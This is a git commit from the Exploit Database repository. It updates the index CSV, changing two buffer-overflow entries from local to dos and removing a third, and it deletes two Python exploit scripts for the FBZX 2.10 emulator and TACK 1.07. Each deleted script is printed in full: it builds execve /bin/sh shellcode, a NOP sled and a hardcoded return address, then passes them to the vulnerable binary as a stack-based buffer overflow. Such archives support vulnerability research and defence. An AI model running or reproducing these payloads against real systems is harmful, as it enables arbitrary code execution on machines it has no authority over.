DB: 2015-11-29
This commit is contained in:
Offensive Security
parent
f25ba13a4f
commit
2270e92015
3 changed files with 2 additions and 99 deletions
|
|
@ -34955,11 +34955,10 @@ id,file,description,date,author,platform,type,port
|
|||
38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0
|
||||
38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0
|
||||
38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0
|
||||
38681,platforms/linux/local/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,local,0
|
||||
38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0
|
||||
38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
|
||||
38683,platforms/php/webapps/38683.txt,"Jahia xCM /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
|
||||
38685,platforms/linux/local/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
|
||||
38686,platforms/linux/local/38686.py,"TUDU 0.82 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
|
||||
38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0
|
||||
38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0
|
||||
38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0
|
||||
38689,platforms/php/webapps/38689.txt,"SilverStripe 'MemberLoginForm.php' Information Disclosure Vulnerability",2013-08-01,"Fara Rustein",php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
|
|
@ -1,48 +0,0 @@
|
|||
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
|
||||
# Program: fbzx - ZX Spectrum Emulator for X
|
||||
# Tested on: GNU/Linux - Kali Linux 2.0 x86
|
||||
#
|
||||
# Description: FBZX v2.10 and prior is prone to a stack-based buffer overflow
|
||||
# vulnerability because the application fails to perform adequate
|
||||
# boundary-checks on user-supplied input.
|
||||
#
|
||||
# An attacker could exploit this issue to execute arbitrary code in the
|
||||
# context of the application. Failed exploit attempts will result in a
|
||||
# denial-of-service condition.
|
||||
#
|
||||
# Vendor homepage: *http://www.rastersoft.com/ <http://www.rastersoft.com/>*
|
||||
# Kali Linux 2.0 package: http://repo.kali.org/kali/pool/contrib/f/fbzx/
|
||||
# MD5: 0fc1d2e9c374c1156b2b02186a9f8980
|
||||
|
||||
import os,subprocess
|
||||
def run():
|
||||
try:
|
||||
print "# FBZX v2.10 Stack-Based Overflow by Juan Sacco"
|
||||
print "# It's Fuzzing time on unusable exploits"
|
||||
print "# This exploit is for educational purposes only"
|
||||
# Basic structure: JUNK + SHELLCODE + NOPS + EIP
|
||||
|
||||
junk = "\x41"*8
|
||||
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
|
||||
nops = "\x90"*5010
|
||||
eip = "\x10\xd3\xff\xbf"
|
||||
subprocess.call(["fbzx",' ', junk + shellcode + nops + eip])
|
||||
|
||||
except OSError as e:
|
||||
if e.errno == os.errno.ENOENT:
|
||||
print "FBZX not found!"
|
||||
else:
|
||||
print "Error executing exploit"
|
||||
raise
|
||||
|
||||
def howtousage():
|
||||
print "Sorry, something went wrong"
|
||||
sys.exit(-1)
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
print "Exploit FBZX 2.10 Local Overflow Exploit"
|
||||
print "Author: Juan Sacco"
|
||||
except IndexError:
|
||||
howtousage()
|
||||
run()
|
||||
|
|
@ -1,48 +0,0 @@
|
|||
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
|
||||
# Program: tack - Terminal action checker
|
||||
# Tested on: GNU/Linux - Kali Linux 2.0 x86
|
||||
#
|
||||
# Description: TACK v1.07 and prior is prone to a stack-based buffer overflow
|
||||
# vulnerability because the application fails to perform adequate
|
||||
# boundary-checks on user-supplied input.
|
||||
#
|
||||
# An attacker could exploit this issue to execute arbitrary code in the
|
||||
# context of the application. Failed exploit attempts will result in a
|
||||
# denial-of-service condition.
|
||||
#
|
||||
# Vendor homepage: *http://www.z <http://www.rastersoft.com/>nyx.com <http://nyx.com>*
|
||||
# Kali Linux 2.0 package: pool/main/t/tack/tack_1.07-1_amd64.deb
|
||||
# MD5: 0fc1d2e9c374c1156b2b02186a9f8980
|
||||
|
||||
import os,subprocess
|
||||
def run():
|
||||
try:
|
||||
print "# TACK v1.07 Stack-Based Overflow by Juan Sacco"
|
||||
print "# It's Fuzzing time on unusable exploits"
|
||||
print "# This exploit is for educational purposes only"
|
||||
# Basic structure: JUNK + SHELLCODE + NOPS + EIP
|
||||
|
||||
junk = "\x41"*10
|
||||
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
|
||||
nops = "\x90"*3022
|
||||
eip = "\x30\xd1\xff\xbf"
|
||||
subprocess.call(["tack",' ', junk + shellcode + nops + eip])
|
||||
|
||||
except OSError as e:
|
||||
if e.errno == os.errno.ENOENT:
|
||||
print "TACK not found!"
|
||||
else:
|
||||
print "Error executing exploit"
|
||||
raise
|
||||
|
||||
def howtousage():
|
||||
print "Sorry, something went wrong"
|
||||
sys.exit(-1)
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
print "Exploit TACK 1.07 Local Overflow Exploit"
|
||||
print "Author: Juan Sacco"
|
||||
except IndexError:
|
||||
howtousage()
|
||||
run()
|
||||
Loading…
Add table
Reference in a new issue